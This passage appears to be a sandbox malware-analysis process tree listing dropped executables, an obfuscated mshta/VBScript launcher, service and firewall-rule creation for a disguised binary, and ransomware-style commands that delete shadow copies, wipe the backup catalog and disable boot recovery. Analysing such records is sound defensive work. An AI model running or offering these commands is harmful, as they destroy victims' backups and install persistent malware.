                                                                                                                                          8⤵
                                                                                                                                            PID:8680
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe
                                                                                                                                              WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9
                                                                                                                                              9⤵
                                                                                                                                                PID:8264
                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                  "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                                                                                                                                  10⤵
                                                                                                                                                    PID:7388
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 " =="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" ) do taskkill -IM "%~nXW" -f
                                                                                                                                                      11⤵
                                                                                                                                                        PID:332
                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                      "C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE
                                                                                                                                                      10⤵
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      PID:2848
                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                    taskkill -IM "6nO7f06vwxv2Y5pKGq5rk7T2.exe" -f
                                                                                                                                                    9⤵
                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                    PID:4972
                                                                                                                                            • C:\Users\Admin\Documents\S1Gy8oo9DUN7kFBY_zDL56Ni.exe
                                                                                                                                              "C:\Users\Admin\Documents\S1Gy8oo9DUN7kFBY_zDL56Ni.exe"
                                                                                                                                              6⤵
                                                                                                                                                PID:7432
                                                                                                                                              • C:\Users\Admin\Documents\QQLpg5bzbdKC425UIhuOzDRm.exe
                                                                                                                                                "C:\Users\Admin\Documents\QQLpg5bzbdKC425UIhuOzDRm.exe"
                                                                                                                                                6⤵
                                                                                                                                                • Loads dropped DLL
                                                                                                                                                PID:8040
                                                                                                                                              • C:\Users\Admin\Documents\r_jeHbxuxK06XQE370y9wHQ_.exe
                                                                                                                                                "C:\Users\Admin\Documents\r_jeHbxuxK06XQE370y9wHQ_.exe"
                                                                                                                                                6⤵
                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                PID:7424
                                                                                                                                              • C:\Users\Admin\Documents\X8roiPNJrO6IcLU9PmKI_T12.exe
                                                                                                                                                "C:\Users\Admin\Documents\X8roiPNJrO6IcLU9PmKI_T12.exe"
                                                                                                                                                6⤵
                                                                                                                                                  PID:7416
                                                                                                                                                • C:\Users\Admin\Documents\DBzEcCSbdVtzhagdm6D3v37K.exe
                                                                                                                                                  "C:\Users\Admin\Documents\DBzEcCSbdVtzhagdm6D3v37K.exe"
                                                                                                                                                  6⤵
                                                                                                                                                    PID:7408
                                                                                                                                                  • C:\Users\Admin\Documents\BZYm7TkRoHgXbjYC_OXM3G7D.exe
                                                                                                                                                    "C:\Users\Admin\Documents\BZYm7TkRoHgXbjYC_OXM3G7D.exe"
                                                                                                                                                    6⤵
                                                                                                                                                      PID:7400
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\4946137.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\4946137.exe"
                                                                                                                                                        7⤵
                                                                                                                                                          PID:8320
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\1325850.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\1325850.exe"
                                                                                                                                                          7⤵
                                                                                                                                                          • Suspicious behavior: SetClipboardViewer
                                                                                                                                                          PID:8372
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\4615000.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\4615000.exe"
                                                                                                                                                          7⤵
                                                                                                                                                            PID:8408
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\3890943.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\3890943.exe"
                                                                                                                                                            7⤵
                                                                                                                                                              PID:8500
                                                                                                                                                          • C:\Users\Admin\Documents\yeIJbmXh48Cgpj_GmLqLJ7_W.exe
                                                                                                                                                            "C:\Users\Admin\Documents\yeIJbmXh48Cgpj_GmLqLJ7_W.exe"
                                                                                                                                                            6⤵
                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                            PID:7392
                                                                                                                                                            • C:\Users\Admin\Documents\yeIJbmXh48Cgpj_GmLqLJ7_W.exe
                                                                                                                                                              "C:\Users\Admin\Documents\yeIJbmXh48Cgpj_GmLqLJ7_W.exe"
                                                                                                                                                              7⤵
                                                                                                                                                                PID:6532
                                                                                                                                                            • C:\Users\Admin\Documents\PLRnJu3PaAV3VXBgmiIJOXYn.exe
                                                                                                                                                              "C:\Users\Admin\Documents\PLRnJu3PaAV3VXBgmiIJOXYn.exe"
                                                                                                                                                              6⤵
                                                                                                                                                                PID:7384
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im "PLRnJu3PaAV3VXBgmiIJOXYn.exe" /f & erase "C:\Users\Admin\Documents\PLRnJu3PaAV3VXBgmiIJOXYn.exe" & exit
                                                                                                                                                                  7⤵
                                                                                                                                                                    PID:5312
                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                      taskkill /im "PLRnJu3PaAV3VXBgmiIJOXYn.exe" /f
                                                                                                                                                                      8⤵
                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                      PID:8564
                                                                                                                                                                • C:\Users\Admin\Documents\Z68FA9PRTh5gsFCJ5kBzYL9g.exe
                                                                                                                                                                  "C:\Users\Admin\Documents\Z68FA9PRTh5gsFCJ5kBzYL9g.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                  PID:7376
                                                                                                                                                                • C:\Users\Admin\Documents\r_kXjlGupxkaMghOnAyL7z9f.exe
                                                                                                                                                                  "C:\Users\Admin\Documents\r_kXjlGupxkaMghOnAyL7z9f.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                    PID:7368
                                                                                                                                                                  • C:\Users\Admin\Documents\MSKE1bDFr1ZimcQ1ozZR0NXi.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\MSKE1bDFr1ZimcQ1ozZR0NXi.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                    PID:7360
                                                                                                                                                                    • C:\Users\Admin\Documents\MSKE1bDFr1ZimcQ1ozZR0NXi.exe
                                                                                                                                                                      "C:\Users\Admin\Documents\MSKE1bDFr1ZimcQ1ozZR0NXi.exe"
                                                                                                                                                                      7⤵
                                                                                                                                                                        PID:6988
                                                                                                                                                                    • C:\Users\Admin\Documents\0bAVMGoyvbKzieEZpO5UfZRd.exe
                                                                                                                                                                      "C:\Users\Admin\Documents\0bAVMGoyvbKzieEZpO5UfZRd.exe"
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                      PID:7352
                                                                                                                                                                    • C:\Users\Admin\Documents\9VBf8hO9GeM2t1qWj3Z7JQD1.exe
                                                                                                                                                                      "C:\Users\Admin\Documents\9VBf8hO9GeM2t1qWj3Z7JQD1.exe"
                                                                                                                                                                      6⤵
                                                                                                                                                                        PID:7344
                                                                                                                                                                      • C:\Users\Admin\Documents\TvjG97jZYmpw5bLLFnVPDFvX.exe
                                                                                                                                                                        "C:\Users\Admin\Documents\TvjG97jZYmpw5bLLFnVPDFvX.exe"
                                                                                                                                                                        6⤵
                                                                                                                                                                          PID:7760
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-OM98P.tmp\TvjG97jZYmpw5bLLFnVPDFvX.tmp
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-OM98P.tmp\TvjG97jZYmpw5bLLFnVPDFvX.tmp" /SL5="$504C6,138429,56832,C:\Users\Admin\Documents\TvjG97jZYmpw5bLLFnVPDFvX.exe"
                                                                                                                                                                            7⤵
                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                            PID:5852
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-C3TUF.tmp\Setup.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-C3TUF.tmp\Setup.exe" /Verysilent
                                                                                                                                                                              8⤵
                                                                                                                                                                                PID:9116
                                                                                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                                                                  9⤵
                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                                                  • Modifies system certificate store
                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                  PID:4244
                                                                                                                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                    "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629579452 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                                                                                    10⤵
                                                                                                                                                                                      PID:7576
                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                                                                                                            5⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            PID:6136
                                                                                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                                                                                                              6⤵
                                                                                                                                                                                PID:7112
                                                                                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              PID:5804
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\3183578.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\3183578.exe"
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:6544
                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\2267536.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\2267536.exe"
                                                                                                                                                                                  6⤵
                                                                                                                                                                                  • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                  PID:6508
                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\1988605.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\1988605.exe"
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:3280
                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\8400711.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\8400711.exe"
                                                                                                                                                                                    6⤵
                                                                                                                                                                                      PID:6376
                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\6560302.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\6560302.exe"
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:6620
                                                                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      PID:5876
                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                              PID:6072
                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                              PID:4940
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-02I8M.tmp\VPN.tmp
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-02I8M.tmp\VPN.tmp" /SL5="$2037E,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:6148
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-V9BGR.tmp\Setup.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-V9BGR.tmp\Setup.exe" /silent /subid=720
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:3932
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-HO238.tmp\Setup.tmp
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-HO238.tmp\Setup.tmp" /SL5="$601FC,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-V9BGR.tmp\Setup.exe" /silent /subid=720
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                      • Modifies system certificate store
                                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                      PID:3624
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:6724
                                                                                                                                                                                          • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                                                            tapinstall.exe remove tap0901
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:4020
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:9716
                                                                                                                                                                                              • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                                                                tapinstall.exe install OemVista.inf tap0901
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                • Modifies system certificate store
                                                                                                                                                                                                PID:988
                                                                                                                                                                                            • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                              "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                                                                                                                              4⤵
                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                              PID:4972
                                                                                                                                                                                            • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                              "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                                                                                                                              4⤵
                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                              PID:4752
                                                                                                                                                                                      • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                        C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Enumerates connected drives
                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                        PID:5192
                                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 9AB7C664C483D5313EB0C59DBED6B3DE C
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                          PID:9132
                                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 515708C9C9B6A77CF5CC1065DE05EAA6 C
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                          PID:7400
                                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 440FA09782E8BC9D8FAE5F2D42251056 C
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                          PID:9396
                                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 45E0E909285C4C1963CA368E224FC6B3
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                          PID:10088
                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                                          PID:7500
                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=715 -BF=715 -uncf=default
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                            PID:9568
                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--M3yPGhgtKO"
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:5744
                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_2A12.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites' -retry_count 10"
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:5320
                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            PID:4388
                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                              2⤵
                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                              PID:7912
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\935.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\935.exe
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                            PID:1636
                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            PID:1728
                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                              2⤵
                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                              PID:7568
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1163.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\1163.exe
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:4212
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\35E4.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\35E4.exe
                                                                                                                                                                                              1⤵
                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                              PID:10116
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\3E03.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\3E03.exe
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:1888
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\pqdfxfdc\
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:2396
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\cltrkmpp.exe" C:\Windows\SysWOW64\pqdfxfdc\
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:9744
                                                                                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                      "C:\Windows\System32\sc.exe" create pqdfxfdc binPath= "C:\Windows\SysWOW64\pqdfxfdc\cltrkmpp.exe /d\"C:\Users\Admin\AppData\Local\Temp\3E03.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:204
                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:7280
                                                                                                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                          "C:\Windows\System32\sc.exe" description pqdfxfdc "wifi internet conection"
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:9392
                                                                                                                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                            "C:\Windows\System32\sc.exe" start pqdfxfdc
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:1728
                                                                                                                                                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                              "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:9420
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\53AF.exe
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\53AF.exe
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:9504
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\5E30.exe
                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\5E30.exe
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                PID:5764
                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                PID:9324
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7F84.exe
                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7F84.exe
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                PID:10108
                                                                                                                                                                                                              • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                                                                                PID:6556
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\8244.exe
                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\8244.exe
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                                                PID:9980
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe" -start
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                                                                                  PID:6348
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe" -agent 0
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                                                                    PID:8132
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:7404
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                        wmic shadowcopy delete
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                          PID:5208
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:8976
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                                                                                                            vssadmin delete shadows /all /quiet
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                            • Interacts with shadow copies
                                                                                                                                                                                                                            PID:9544
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:6312
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:6564
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:8012
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:6276
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                    wmic shadowcopy delete
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                      PID:8356
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                                                  notepad.exe
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:204
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\963A.exe
